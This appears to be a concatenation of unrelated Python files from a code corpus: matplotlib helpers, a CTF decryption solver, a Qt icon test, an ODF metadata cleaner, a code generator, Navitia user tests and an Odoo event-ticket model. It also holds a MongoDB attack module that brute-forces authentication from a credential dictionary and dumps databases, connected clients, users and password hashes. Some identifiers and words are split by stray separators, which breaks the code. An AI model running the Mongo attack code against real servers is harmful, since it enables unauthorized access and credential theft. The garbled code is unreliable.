    elif not isinstance(ax, pyplot.Axes):
        raise ValueError("`ax` must be a matplotlib Axes instance or None")
    return ax.figure, ax
def axis_name(axis, axname):
    """
    Checks that an axis name is in ``{'x', 'y'}``. Raises an error on
    an invalid value. Returns the lower case version of valid values.

    Parameters
    ----------
    axis : str
        Candidate axis name (compared case-insensitively).
    axname : str
        Name of the argument, used in the error message.
    """
    valid_args = ["x", "y"]
    if axis.lower() not in valid_args:
        # Fixed typo in the error message ("on of" -> "one of").
        msg = "Invalid value for {} ({}). Must be one of {}."
        raise ValueError(msg.format(axname, axis, valid_args))
    return axis.lower()
def fit_argument(arg, argname):
    """
    Checks that an axis option is in ``{'x', 'y', 'both', None}``.
    Raises an error on an invalid value. Returns the lower case version
    of valid values.

    Parameters
    ----------
    arg : str or None
        Candidate option.
    argname : str
        Name of the argument, used in the error message.
    """
    valid_args = ["x", "y", "both", None]
    if arg not in valid_args:
        # Fixed typo in the error message ("on of" -> "one of").
        msg = "Invalid value for {} ({}). Must be one of {}."
        raise ValueError(msg.format(argname, arg, valid_args))
    elif arg is not None:
        arg = arg.lower()
    return arg
def axis_type(a | xtype):
"""
Checks that a valid axis type is requested.
- *pp* - percentile axis
- *qq* - quantile axis
- *prob* - probability axis
Raises an error on an invalid value. Returns the lower case version
of valid values.
"""
if axtype.lower() not in ["pp", "qq", "prob"]:
raise ValueError("invalid axtype: {}".format(axtype))
return axtype.lower()
def axis_label(label):
    """Return *label* unchanged, or an empty string when it is None."""
    if label is None:
        return ""
    return label
def other_options(options):
    """Return a shallow copy of *options*, or a fresh empty dict for None."""
    if options is None:
        return dict()
    return options.copy()
def estimator(value):
    """Map an estimator name to its bootstrap implementation.

    Residual-based names are recognized but not implemented yet;
    fit/value-based names resolve to ``_bs_fit``.
    """
    key = value.lower()
    if key in ("res", "resid", "resids", "residual", "residuals"):
        raise NotImplementedError("Bootstrapping the residuals is not ready yet")
    if key in ("fit", "values"):
        return _bs_fit
    raise ValueError('estimator must be either "resid" or "fit".')
|
Qwaz/solved-hacking-problem | sciencewar/2018/ezbt/solver.py | Python | gpl-2.0 | 990 | 0.00101 | import binascii
# Ciphertext dumped from the challenge binary, as space-separated hex bytes.
data = '''
D9 51 44 5C 65 D5 3D 7D C8 67 BC 68 C8 68 6F 3F
C8 64 3F 30 48 41 72 3F 75 C8 67 F4 68 48 B9 6E
7C C8 7F 3C 74 5C 74 3C 74 3C 5C 3C 74 3C 5C 77
48 FE E8 67 C8 49 48 48 48 48 48 48 48 48 48 48
71 43 00 00 00 00 00 00
'''
data = data.replace(' ', '')
data = data.replace('\n', '')
# Decode the hex dump into a mutable list of byte values (Python 2: ord over str).
data = list(map(ord, binascii.unhexlify(data)))
def unbit(val, bitsize=8):
    """Undo the differential (XOR-with-previous-bit) encoding of *val*.

    Walks the stored difference bits from most to least significant,
    XOR-ing each with the previously recovered bit, and reassembles the
    original ``bitsize``-bit integer.
    """
    # Difference bits of *val*, least significant first.
    diff = [(val >> i) & 1 for i in range(bitsize)]
    acc, last = 0, 0
    for bit in reversed(diff):
        last ^= bit
        acc = (acc << 1) | last
    return acc
length = len(data)
# Undo the 64-bit-wide differential pass applied to each full 8-byte block
# (the final, shorter block is left untouched by this stage).
for i in range(0, length-8, 8):
    acc = 0
    shift = 0
    # Assemble the 8 bytes into one little-endian 64-bit integer.
    for j in range(8):
        acc += data[i+j] << shift
        shift += 8
    acc = unbit(acc, 8 * 8)
    # Scatter the decoded integer back into its component bytes.
    for j in range(8):
        data[i+j] = acc & 0xFF
        acc = acc >> 8
# Undo the per-byte differential pass, then print the recovered plaintext.
for i in range(length):
    data[i] = unbit(data[i])
print ''.join(map(chr, data))
|
Pardus-Linux/pds | pds/tests/test-pds.py | Python | gpl-2.0 | 2,879 | 0.003128 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# Pardus Desktop Services Test-Suit
# Copyright (C) 2010, TUBITAK/UEKAE
# 2010 - Gökmen Göksel <gokmen:pardus.org.tr>
# This program is free software; you can redistribute it and/or modify it under
# the terms of the GNU General Public License as published by the Free
# Software Foundation; either version 2 of the License, or (at your option)
# any later version.
import pds
from time import time
from PyQt4 import QtCore, QtGui
from pds.qiconloader import QIconLoader
class Ui_Test(object):
    # Minimal Qt widget used to exercise the PDS QIconLoader interactively.

    def setupUi(self, Test):
        """Build the test window: icon-name combo, size combo, button, preview label."""
        Test.setObjectName("Test")
        Test.resize(460, 300)
        self.gridLayout = QtGui.QGridLayout(Test)
        self.gridLayout.setObjectName("gridLayout")
        # Editable combo so arbitrary icon names can be typed in.
        self.name = QtGui.QComboBox(Test)
        self.name.setObjectName("name")
        self.name.setEditable(True)
        self.gridLayout.addWidget(self.name, 0, 0, 1, 1)
        self.size = QtGui.QComboBox(Test)
        self.size.setObjectName("size")
        self.size.setMaximumSize(QtCore.QSize(100, 16777215))
        self.size.addItem("128")
        self.size.addItem("64")
        self.size.addItem("48")
        self.size.addItem("32")
        self.size.addItem("22")
        self.size.addItem("16")
        self.gridLayout.addWidget(self.size, 0, 1, 1, 1)
        self.getButton = QtGui.QPushButton(Test)
        self.getButton.setText("Get Icon")
        self.getButton.setMaximumSize(QtCore.QSize(100, 16777215))
        self.gridLayout.addWidget(self.getButton, 0, 2, 1, 1)
        self.label = QtGui.QLabel(Test)
        self.label.setObjectName("label")
        self.gridLayout.addWidget(self.label, 1, 0, 1, 3)
        self.getButton.clicked.connect(self.showIcon)
        QtCore.QMetaObject.connectSlotsByName(Test)
        Pds = pds.Pds(debug = True)
        # Force to use Default Session for testing
        # Pds.session = pds.DefaultDe
        self.loader = QIconLoader(Pds, debug = True)
        # Auto-complete icon names against everything the loader discovered.
        completer = QtGui.QCompleter(self.loader._available_icons)
        self.name.setCompleter(completer)
        self.getButton.setShortcut("Return")
        print "Desktop Session :", self.loader.pds.session.Name
        print "Desktop Version :", self.loader.pds.session.Version
        print "Icon Paths :", self.loader.iconDirs
        print "Theme :", self.loader.themeName

    def showIcon(self):
        """Load the requested icon(s) at the selected size and time the lookup."""
        a = time()
        print "Clicked !"
        # The name field may hold a comma-separated list of fallback icon names.
        icons = unicode(self.name.currentText())
        self.label.setPixmap(self.loader.load(icons.split(','),
                             self.size.currentText()))
        print 'It took : ', time() - a
print 'It took : ', time() - a
if __name__ == "__main__":
import sys
app = QtGui.QApplication(sys.argv)
Test = QtGui.QWidget()
a = time()
print "Started !"
ui = Ui_Test()
ui.setupUi(Test)
Test.show()
print 'It took : ', time() - a
sys.exit(app.exec_())
|
overxfl0w/Grampus-Forensic-Utils | Metadata/Documents/OpenOffice/cleanopenoffi.py | Python | gpl-2.0 | 4,193 | 0.00787 | from tempfile import mkdtemp
from zipfile import ZipFile, is_zipfile
from shutil import rmtree, copyfileobj
from xml.dom.minidom import parse
import os
class cleanopenoffi():
    """Strip identifying metadata from an OpenOffice (ODF) document.

    The document is a zip container: meta.xml / content.xml / settings.xml
    are extracted next to the script, scrubbed, and repacked into a new
    document named *newDocName*. Cleaning runs immediately on construction.
    """

    def __init__(self, sDocName, newDocName):
        # sDocName: path of the original document; newDocName: cleaned copy.
        self.sDocName = sDocName
        self.newDocName = newDocName
        self._ms_do()

    def _ms_do(self):
        """Driver: extract the XML parts, clean them, then rebuild the archive."""
        #uncompressing
        if self.__uncompress():
            #cleaning xml files
            self._xml_cleaner()
            self._xml_extra_cleaner()
            #compressing , adding and deleting
            self.__compress()
            self._meta_adder()
        else:
            # NOTE(review): `sys` is used here (and below) but never imported in
            # this module -- these branches would raise NameError. TODO confirm.
            print "An error has ocurred uncompressing"
            sys.exit(0)

    def __uncompress(self):
        """Extract the three metadata XML parts; False if input is not a zip."""
        #uncompressing metadata containers
        if not is_zipfile(self.sDocName):
            return False
        buff = ZipFile(self.sDocName, 'r')
        for i in buff.namelist():
            if i in ('meta.xml', 'content.xml', 'settings.xml'):
                filename = os.path.basename(i)
                source = buff.open(i)
                target = file(os.path.join(filename), 'wb')
                copyfileobj(source, target)
                source.close()
                target.close()
        return True

    def _xml_cleaner(self):
        """Blank author/date/title/keyword metadata values in meta.xml."""
        dom = parse(os.path.join('meta.xml'))
        metalist = ['meta:creation-date',
                    'dc:date',
                    'meta:editing-cycles',
                    'meta:editing-duration',
                    'meta:generator',
                    'dc:title',
                    'dc:description',
                    'meta:keyword',
                    'dc:language',
                    'meta:initial-creator',
                    'dc:creator']
        #cleaning tags values
        for i in metalist:
            try:
                for a in dom.getElementsByTagName(i):
                    a.childNodes[0].nodeValue = ""
            except:
                print "Error, tagname not found"
                sys.exit(0)
        #Saving in meta.xml
        f = open(os.path.join('meta.xml'), 'w')
        dom.writexml(f)
        f.close()

    def _xml_extra_cleaner(self):
        """Blank every hyperlink target (xlink:href) found in content.xml."""
        #cleaning tags values in content.xml
        content = parse(os.path.join('content.xml'))
        content_tag = content.getElementsByTagName("text:a")
        for node in content_tag:
            try:
                node.setAttribute('xlink:href', str(''))
            except:
                print "Error, tagname not found"
                sys.exit(0)
        f = open(os.path.join('content.xml'), 'w')
        content.writexml(f)
        f.close()
        #cleaning tags values in settings.xml(WILL MUST CORRECT IT)
        #PENDING A FIX FOR IT(when we have more time)
        """
        settings = parse(os.path.join('settings.xml'))
        settings_tag = settings.getElementsByTagName("config:config-item")
        for another_node in settings_tag:
            try:
                another_node.setAttribute('config:name', str(''))
            except:
                print "An error has ocurred, but not is very important, you can continue"
        j = open(os.path.join('settings.xml'), 'w')
        settings.writexml(j)
        j.close()
        """

    def __compress(self):
        """Copy the original archive to newDocName, omitting the three XML parts."""
        zf = ZipFile(self.sDocName, 'r')
        zp = ZipFile(self.newDocName, 'w')
        for item in zf.infolist():
            try:
                #triying to write a new document without meta,content & settings .xml
                buffer = zf.read(item.filename)
                if (item.filename[-8:] != 'meta.xml') and (item.filename[-11:] != 'content.xml') and (item.filename[-12:] != 'settings.xml'):
                    zp.writestr(item, buffer)
            except:
                print "Can't write"
                sys.exit(0)
        zf.close()
        zp.close()

    def _meta_adder(self):
        """Append the cleaned XML parts to the new archive and remove temp files."""
        zf = ZipFile(self.newDocName, 'a')
        zf.write('meta.xml')
        zf.write('content.xml')
        zf.write('settings.xml')
        zf.close()
        #deleting container files
        os.remove('meta.xml')
        os.remove('content.xml')
        os.remove('settings.xml')
cleanopenoffi("test.odt","test2.odt")
|
smartdevicelink/sdl_ios | generator/transformers/structs_producer.py | Python | bsd-3-clause | 1,726 | 0.001738 | """
Structs transformer
"""
import logging
from collections import OrderedDict
from model.struct import Struct
from transformers.common_producer import InterfaceProducerCommon
class StructsProducer(InterfaceProducerCommon):
    """
    Structs transformer
    """

    def __init__(self, struct_class, enum_names, struct_names, key_words):
        # struct_class: name of the base class every produced struct extends.
        super(StructsProducer, self).__init__(enum_names=enum_names, struct_names=struct_names, key_words=key_words)
        self._container_name = 'members'
        self.struct_class = struct_class
        self.logger = logging.getLogger(self.__class__.__name__)

    @property
    def container_name(self):
        # Name of the Struct attribute holding its child elements.
        return self._container_name

    def transform(self, item: Struct, render: dict = None) -> dict:
        """
        Main entry point for transforming each Enum/Function/Struct into output dictionary,
        which going to be applied to Jinja2 template
        :param item: instance of Enum/Function/Struct
        :param render: dictionary with pre filled entries, which going to be filled/changed by reference
        :return: dictionary which going to be applied to Jinja2 template
        """
        # Normalize legacy names, then apply the "SDL" class-name prefix.
        item.name = self._replace_sync(item.name)
        name = 'SDL' + item.name
        imports = {'.h': {'enum': set(), 'struct': set()}, '.m': set()}
        imports['.h']['enum'].add(self.struct_class)
        if not render:
            # Fresh render dict: seed it with the basic identity entries.
            render = OrderedDict()
            render['origin'] = item.name
            render['name'] = name
            render['extends_class'] = self.struct_class
            render['imports'] = imports
        render['history'] = item.history
        super(StructsProducer, self).transform(item, render)
        return render
|
WoodNeck/tataru | test/__init__.py | Python | mit | 64 | 0.015625 | import sys
import | os
sys.path.append(os.path.ab | spath(os.curdir)) |
kadhikari/navitia | source/tyr/tests/integration/users_test.py | Python | agpl-3.0 | 24,886 | 0.002572 | # coding: utf-8
# Copyright (c) 2001-2018, Canal TP and/or its affiliates. All rights reserved.
#
# This file is part of Navitia,
# the software to build cool stuff with public transport.
#
# powered by Canal TP (www.canaltp.fr).
# Help us simplify mobility and open public transport:
# a non ending quest to the responsive locomotion way of traveling!
#
# LICENCE: This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
| # the Free Software Foundation, either ve | rsion 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
# Stay tuned using
# twitter @navitia
# IRC #navitia on freenode
# https://groups.google.com/d/forum/navitia
# www.navitia.io
from __future__ import absolute_import, print_function, division
from tests.check_utils import api_get, api_post, api_delete, api_put, _dt
import json
import pytest
import mock
from navitiacommon import models
from tyr.rabbit_mq_handler import RabbitMqHandler
from tyr import app
import urllib
@pytest.fixture
def geojson_polygon():
    """A single-ring GeoJSON polygon feature."""
    ring = [[100.0, 0.0], [101.0, 0.0], [101.0, 1.0], [100.0, 1.0], [100.0, 0.0]]
    return {
        "type": "Feature",
        "geometry": {"type": "Polygon", "coordinates": [ring]},
    }
@pytest.fixture
def geojson_multipolygon():
    """A GeoJSON multi-polygon feature; the second polygon carries a hole."""
    poly1 = [
        [[102.0, 2.0], [103.0, 2.0], [103.0, 3.0], [102.0, 3.0], [102.0, 2.0]],
    ]
    poly2 = [
        [[100.0, 0.0], [101.0, 0.0], [101.0, 1.0], [100.0, 1.0], [100.0, 0.0]],
        [[100.2, 0.2], [100.8, 0.2], [100.8, 0.8], [100.2, 0.8], [100.2, 0.2]],
    ]
    return {
        "type": "Feature",
        "geometry": {"type": "MultiPolygon", "coordinates": [poly1, poly2]},
    }
@pytest.fixture
def invalid_geojsonfixture():
    """A GeoJSON point with empty coordinates, i.e. an invalid shape."""
    return {"type": "Feature", "geometry": {"type": "Point", "coordinates": []}}
@pytest.fixture
def create_user(geojson_polygon):
    """Insert one user on the default end point, carrying a polygon shape.

    Returns the user id only: the ORM object does not survive the app context.
    """
    with app.app_context():
        user = models.User('test', 'test@example.com')
        user.end_point = models.EndPoint.get_default()
        user.billing_plan = models.BillingPlan.get_default(user.end_point)
        user.shape = json.dumps(geojson_polygon)
        models.db.session.add(user)
        models.db.session.commit()
        return user.id
@pytest.fixture
def create_user_without_shape():
    """Insert one default user with no shape; returns the user id."""
    with app.app_context():
        user = models.User('test', 'test@example.com')
        user.end_point = models.EndPoint.get_default()
        user.billing_plan = models.BillingPlan.get_default(user.end_point)
        models.db.session.add(user)
        models.db.session.commit()
        return user.id
@pytest.fixture
def create_instance():
    """Insert one instance named 'instance'; returns its id."""
    with app.app_context():
        instance = models.Instance('instance')
        models.db.session.add(instance)
        models.db.session.commit()
        return instance.id
@pytest.yield_fixture
def mock_rabbit():
    """Patch RabbitMqHandler.publish so tests can assert on publications."""
    with mock.patch.object(RabbitMqHandler, 'publish') as m:
        yield m
@pytest.fixture
def create_multiple_users(request, geojson_polygon):
    """Insert two users: one on a custom end point/billing plan, one on defaults.

    Returns a dict of the created ids; the custom end point and billing plan
    are removed in a finalizer because table truncation does not cover them.
    """
    with app.app_context():
        end_point = models.EndPoint()
        end_point.name = 'myEndPoint'
        billing_plan = models.BillingPlan()
        billing_plan.name = 'free'
        billing_plan.end_point = end_point
        user1 = models.User('foo', 'foo@example.com')
        user1.end_point = end_point
        user1.billing_plan = billing_plan
        user1.shape = json.dumps(geojson_polygon)
        user2 = models.User('foodefault', 'foo@example.com')
        user2.end_point = models.EndPoint.get_default()
        user2.billing_plan = models.BillingPlan.get_default(user2.end_point)
        models.db.session.add(end_point)
        models.db.session.add(billing_plan)
        models.db.session.add(user1)
        models.db.session.add(user2)
        models.db.session.commit()
        # we end the context but need to keep some id for later (object won't survive this lost!)
        d = {'user1': user1.id, 'user2': user2.id, 'end_point': end_point.id, 'billing_plan': billing_plan.id}

    # we can't truncate end_point and billing_plan, so we have to delete them explicitly
    def teardown():
        with app.app_context():
            end_point = models.EndPoint.query.get(d['end_point'])
            billing_plan = models.BillingPlan.query.get(d['billing_plan'])
            models.db.session.delete(end_point)
            models.db.session.delete(billing_plan)
            models.db.session.commit()
    request.addfinalizer(teardown)
    return d
@pytest.fixture
def create_billing_plan():
    """Insert a billing plan on the default end point; returns its id."""
    with app.app_context():
        billing_plan = models.BillingPlan(name='test', max_request_count=10, max_object_count=100,
                                          end_point_id=models.EndPoint.get_default().id)
        models.db.session.add(billing_plan)
        models.db.session.commit()
        return billing_plan.id
def test_get_users_empty():
    # A fresh database exposes no users at all.
    resp = api_get('/v0/users/')
    assert resp == []
def test_add_user_without_shape(mock_rabbit):
    """
    creation of a user without shape
    When we get this user, we should see
    shape = None and has_shape = False
    """
    user = {'login': 'user1', 'email': 'user1@example.com'}
    data = json.dumps(user)
    resp = api_post('/v0/users/', data=data, content_type='application/json')

    def check(u):
        # Compare every submitted field (except shape) plus the defaults.
        gen = (k for k in user if k != 'shape')
        for k in gen:
            assert u[k] == user[k]
        assert u['end_point']['name'] == 'navitia.io'
        assert u['type'] == 'with_free_instances'
        assert u['block_until'] is None

    check(resp)
    assert resp['shape'] is None
    assert resp['has_shape'] is False
    assert mock_rabbit.called
    # we did not give any coord, so we don't have some
    assert resp['default_coord'] is None
    # with disable_geojson=true by default
    resp = api_get('/v0/users/')
    assert len(resp) == 1
    check(resp[0])
    assert resp[0]['shape'] is None
    assert resp[0]['has_shape'] is False
    # with disable_geojson=false
    resp = api_get('/v0/users/?disable_geojson=false')
    assert len(resp) == 1
    check(resp[0])
    assert resp[0]['shape'] is None
    assert resp[0]['has_shape'] is False
def test_add_user(mock_rabbit, geojson_polygon):
    """
    creation of a user passing arguments as a json
    """
    coord = '2.37730;48.84550'
    user = {'login': 'user1', 'email': 'user1@example.com', 'shape': geojson_polygon, 'has_shape': True,
            'default_coord': coord}
    data = json.dumps(user)
    resp = api_post('/v0/users/', data=data, content_type='application/json')

    def check(u):
        # Compare every submitted field (except shape) plus the defaults.
        gen = (k for k in user if k != 'shape')
        for k in gen:
            assert u[k] == user[k]
        assert u['end_point']['name'] == 'navitia.io'
        assert u['type'] == 'with_free_instances'
        assert u['block_until'] is None

    check(resp)
    assert resp['shape'] == geojson_polygon
    assert resp['default_coord'] == coord
    resp = api_get('/v0/users/')
    assert len(resp) == 1
    check(resp[0])
    # geojson is disabled by default on the list endpoint: shape collapses to {}
    assert resp[0]['shape'] == {}
    assert mock_rabbit.called
def test_add_user_with_multipolygon(mock_rabbit, geojson_multipolygon):
    """
    creation of a user with multipolygon shape
    status must be 200 when bragi will accept multipolygon shape
    """
    user = {'login': 'user1', 'email': 'user1@example.com', 'shape': geojson_multipolygon, 'has_shape': True}
    data = json.dumps(user)
    resp, status = api_post('/v0/users/', check=False, data=data, content_type='application/json')
    assert status == 400
    # creation was rejected, so nothing must have been published to rabbit
    assert mock_rabbit.call_count == 0
def test_add |
ajinabraham/Nosql-Exploitation-Framework | dbattacks/mongoattacks.py | Python | bsd-3-clause | 11,573 | 0.003111 | # Mongo Attack file
import threading
import pymongo
from pymongo import MongoClient
from termcolor import colored
from dbattacks.utils import screenshot
import requests
global passfound
def mongo_conn(target, port=27017, mass=False):
    """
    Establishes Connection with MongoDB and Determines whether alive or not and returns the connection object
    """
    try:
        # Moved to MongoClient since Connection is Deprecated
        conn = MongoClient(str(target), port)
        # db = conn['test']
        if mass and conn.database_names():  # Checks when mass scan of a IP List is provided
            print colored("[+] MongoDB port open on " + target + ":27017!\n", 'green')
        elif conn.database_names():
            print colored("[+] MongoDB port open on " + target + ":27017!\n", 'green')
        return conn
    except pymongo.errors.OperationFailure:
        # Listing databases needed auth, but the port answered: report open.
        if mass:
            print colored("[+] MongoDB port open " + target + ":27017 \n", 'green')
        else:
            print colored("[+] MongoDB port open " + target + ":27017 \n", 'green')
        return conn
        # sys.exit()
    except pymongo.errors.ConnectionFailure:
        # Port closed/unreachable; falls through returning None implicitly.
        if mass:
            print colored("[+] MongoDB port closed " + target + ":27017 \n", 'red')
        else:
            print colored("[-] MongoDB port closed. \n", 'red')
        # sys.exit()
def dict_mongo(file_name, target, port=27017, db='admin'):
    """
    Used to For Dictionary Attack on MongoDB reads from Dictionary of format 'username:password'
    By default Dictionary attacks for admin DB
    Multithreaded the Module
    """
    t1 = ""
    print colored("[-] Dictionary Attack Module For NoSQL Framework Launched .. \n", 'blue')
    conn = MongoClient(target, port)
    try:
        db = conn[db]  # Use admin by Default
        file = open(file_name, "r")
        lines = file.read().split('\n')
        for names in lines:
            # s1 = names
            # One thread per candidate credential line.
            t1 = threading.Thread(target=tryandgetpass, args=(db, names))
            t1.start()
        # NOTE(review): `passfound` is read without joining the worker threads,
        # so a late success may be missed here -- TODO confirm intent.
        if passfound:
            print colored(passfound, 'green')
        else:
            print colored("[-] Password Not found in the File Specified", 'red')
    except Exception, e:
        print colored(str(e), 'red')
# Module to try mongo authentication
def tryandgetpass(db, names):
    """Worker: try one 'user:pass' line against *db*; record success globally."""
    global passfound
    # NOTE(review): every worker resets the shared flag, so a success found by
    # an earlier thread can be erased by a later one -- TODO confirm intent.
    passfound = ""
    try:
        if names:
            db.authenticate(names.split(':')[0], names.split(':')[1])
            # print colored("[+] Auth Succeeded with username:%s and Password
            # %s"%(names.split(':')[0],names.split(':')[1]),'green')
            passfound = "[+] Auth Succeeded with username:%s and Password %s" % (
                names.split(':')[0], names.split(':')[1])
        else:
            pass
    except pymongo.errors.OperationFailure:
        print colored("[-] Auth Failed with username:%s and Password %s" % (names.split(':')[0], names.split(':')[1]), 'red')
# Checks for Mongo Web Interface
def mongo_web_interface(target, port=28017, creds=False, enableScreen=False):
    """Probe MongoDB's HTTP console (default port 28017) and its REST interface.

    Optionally captures a screenshot of the page when enableScreen is set.
    """
    try:
        url = 'http://' + target + ':' + str(port)
        code = requests.get(url)
        # The console page mentions "mongo" and "db version" when exposed.
        if code.status_code == 200 and code.content.find('mongo') != -1 and code.content.find('db version') != -1:
            print colored("\n[+] MongoDB web management open at " + url + ". No authentication required!", 'blue')
            rest_url = url + '/buildInfo?text=1'
            testrest = requests.get(rest_url)
            if testrest.content.find('not enabled') != -1:
                print colored("\n[-] REST Interface Not enabled", 'red')
            else:
                print colored("\n[+] REST Interface Enabled URL: " + rest_url, 'green')
            if enableScreen:
                screenshot(url, creds)
        elif code.status_code == 401:
            # Console present but password protected.
            print colored("[-] MongoDB web management Open at " + url + ". Authentication required!", 'blue')
            print colored("[-] Try Supplying credentials using the Auth option", 'blue')
            print colored("[-] Do you Want to Take a ScreenShot of the Page (y/n)", 'yellow')
            # choice = raw_input()
            if enableScreen:
                screenshot(url, creds)
            else:
                pass
        else:
            print colored("[-] Web Interface Not Open", 'red')
    except Exception, e:
        print str(e)
def mongo_enum(conn, creds=False, authall=False, sel_db='admin', collection=False, dump=False, limit=0, file_write=False):
"""
Mongo Enumeration phase. Determines version and Clients Connected.
Dumps the Available Databases and collections
Default Uses admin database to grab credentials
"""
#temp_db = sel_db
print colored("[+] Enumeration Module For NoSQL Framework Launched .. \n", 'blue')
if authall:
creds = authall
sel_db = 'admin'
if creds:
db = conn[sel_db]
try:
db.authenticate(creds.split(':')[0], creds.split(':')[1])
print colored("[-] Retrying with Supplying Credentials", 'green')
except pymongo.errors.OperationFailure:
print colored("\t[-] Authentication Failed with Credentials " + creds, 'red')
fail = True
print sel_db
fail = False
further = True
nodoc = False
done = False
db = conn[sel_db]
client = db.current_op('true')
print colored("[!] Server Info: \n", 'yellow')
serverInfo = conn.server_info()
for keys in serverInfo:
print colored("\t[-]" + (keys) + ":" + str(serverInfo[keys]), 'green')
print "\n"
print colored("[+] Checking for the Command Line Arguments", 'green')
try:
db = conn['admin']
cmdargs = db.command('getCmdLineOpts')
# print cmdargs
for i in cmdargs:
print colored("\t[+] " + i + ":" + str(cmdargs.get(i)), 'green')
db = conn[sel_db]
except Exception as e:
print colored("\t [-] Failed Exception : " + str(e), 'red')
if not client.get('err'):
print colored("[!] Clients Connected: ", 'yellow')
for i in client['inprog']:
try:
print colored("\t[-]" + i['client'], 'green')
except KeyError, e:
pass
print "\n"
else:
print colored("[!] Could not Fetch Clients Connected \n", 'yellow')
print colored("\t[-] Unauthorized Supply Creds \n", 'red')
# Code inspired from NoSQLMAP(kudos to the developer and a sincere apology
# for the late)
try:
print colored("[!] List of databases:", 'blue')
dbList = conn.database_names()
for i in dbList:
print colored("\t[+]" + i, 'green')
except Exception as e:
print colored("\t[-] Error Occured:" + str(e), 'red')
further = False
try:
if sel_db:
db = conn[sel_db]
colls = db.collection_names()
if colls:
print colored("\t[-] " + sel_db + ":", 'magenta')
else:
print colored("[-] admin DB does not have any Collections\n", 'yellow')
for i in colls:
try:
print colored("\t\t[-]" + i, 'green')
if 'system.users' in colls:
users = list(db.system.users.find())
print colored("\n[!] Found system.users for '" + sel_db + "' Checking for Users and Password Hashes:", 'yellow')
print colored("\n[+] Found '" + sel_db + "' Users and Password Hashes:", 'blue')
print colored("[-]" + str(users), 'green')
print "\n"
except Exception as e:
print str(e)
print colored("[-] not authorized to query the system.users spaces", 'red')
done = True
if dump:
db = conn[sel_db]
if collection in db.collection_names():
coll = db[collection]
else:
print colored('[-] Invalid Collection Name', 'red')
print colored("\n[+] Dumping '" |
chienlieu2017/it_management | odoo/addons/event_sale/models/event.py | Python | gpl-3.0 | 7,511 | 0.005059 | # -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
from odoo import api, fields, models, _
from odoo.exceptions import ValidationError
import odoo.addons.decimal_precision as dp
class Event(models.Model):
    _inherit = 'event.event'

    def _default_tickets(self):
        """Default to a single free 'Registration' ticket on the generic event product."""
        product = self.env.ref('event_sale.product_product_event', raise_if_not_found=False)
        if not product:
            # Reference product removed: start with no tickets at all.
            return self.env['event.event.ticket']
        return [{
            'name': _('Registration'),
            'product_id': product.id,
            'price': 0,
        }]

    event_ticket_ids = fields.One2many('event.event.ticket', 'event_id', string='Event Ticket',
        default=lambda self: self._default_tickets(), copy=True)
class EventTicket(models.Model):
    _name = 'event.event.ticket'
    _description = 'Event Ticket'

    def _default_product_id(self):
        # Generic event product shipped with the module (may be absent).
        return self.env.ref('event_sale.product_product_event', raise_if_not_found=False)

    name = fields.Char(string='Name', required=True, translate=True)
    event_id = fields.Many2one('event.event', string="Event", required=True, ondelete='cascade')
    product_id = fields.Many2one('product.product', string='Product',
        required=True, domain=[("event_ok", "=", True)], default=_default_product_id)
    registration_ids = fields.One2many('event.registration', 'event_ticket_id', string='Registrations')
    price = fields.Float(string='Price', digits=dp.get_precision('Product Price'))
    deadline = fields.Date(string="Sales End")
    is_expired = fields.Boolean(string='Is Expired', compute='_compute_is_expired')
    price_reduce = fields.Float(string="Price Reduce", compute="_compute_price_reduce", digits=dp.get_precision('Product Price'))
    # seats fields
    seats_availability = fields.Selection([('limited', 'Limited'), ('unlimited', 'Unlimited')],
        string='Available Seat', required=True, store=True, compute='_compute_seats', default="limited")
    seats_max = fields.Integer(string='Maximum Available Seats',
        help="Define the number of available tickets. If you have too much registrations you will "
             "not be able to sell tickets anymore. Set 0 to ignore this rule set as unlimited.")
    seats_reserved = fields.Integer(string='Reserved Seats', compute='_compute_seats', store=True)
    seats_available = fields.Integer(string='Available Seats', compute='_compute_seats', store=True)
    seats_unconfirmed = fields.Integer(string='Unconfirmed Seat Reservations', compute='_compute_seats', store=True)
    seats_used = fields.Integer(compute='_compute_seats', store=True)

    @api.multi
    def _compute_is_expired(self):
        # Compare the deadline against "today" in the event's own timezone.
        for record in self:
            if record.deadline:
                current_date = fields.Date.context_today(record.with_context({'tz': record.event_id.date_tz}))
                record.is_expired = record.deadline < current_date
            else:
                record.is_expired = False

    @api.multi
    def _compute_price_reduce(self):
        # Apply the product's pricelist discount ratio to the ticket price.
        for record in self:
            product = record.product_id
            discount = product.lst_price and (product.lst_price - product.price) / product.lst_price or 0.0
            record.price_reduce = (1.0 - discount) * record.price

    @api.multi
    @api.depends('seats_max', 'registration_ids.state')
    def _compute_seats(self):
        """ Determine reserved, available, reserved but unconfirmed and used seats. """
        # initialize fields to 0 + compute seats availability
        for ticket in self:
            ticket.seats_availability = 'unlimited' if ticket.seats_max == 0 else 'limited'
            ticket.seats_unconfirmed = ticket.seats_reserved = ticket.seats_used = ticket.seats_available = 0
        # aggregate registrations by ticket and by state
        if self.ids:
            state_field = {
                'draft': 'seats_unconfirmed',
                'open': 'seats_reserved',
                'done': 'seats_used',
            }
            query = """ SELECT event_ticket_id, state, count(event_id)
                        FROM event_registration
                        WHERE event_ticket_id IN %s AND state IN ('draft', 'open', 'done')
                        GROUP BY event_ticket_id, state
                    """
            self.env.cr.execute(query, (tuple(self.ids),))
            for event_ticket_id, state, num in self.env.cr.fetchall():
                ticket = self.browse(event_ticket_id)
                ticket[state_field[state]] += num
        # compute seats_available
        for ticket in self:
            if ticket.seats_max > 0:
                ticket.seats_available = ticket.seats_max - (ticket.seats_reserved + ticket.seats_used)

    @api.multi
    @api.constrains('registration_ids', 'seats_max')
    def _check_seats_limit(self):
        # Reject any write that would oversell a limited ticket.
        for record in self:
            if record.seats_max and record.seats_available < 0:
                raise ValidationError(_('No more available seats for the ticket'))

    @api.onchange('product_id')
    def _onchange_product_id(self):
        # Default the ticket price from the selected product's list price.
        self.price = self.product_id.list_price or 0
class EventRegistration(models.Model):
    """Registration extended with the sale order (line) it originates from."""
    _inherit = 'event.registration'

    event_ticket_id = fields.Many2one('event.event.ticket', string='Event Ticket')
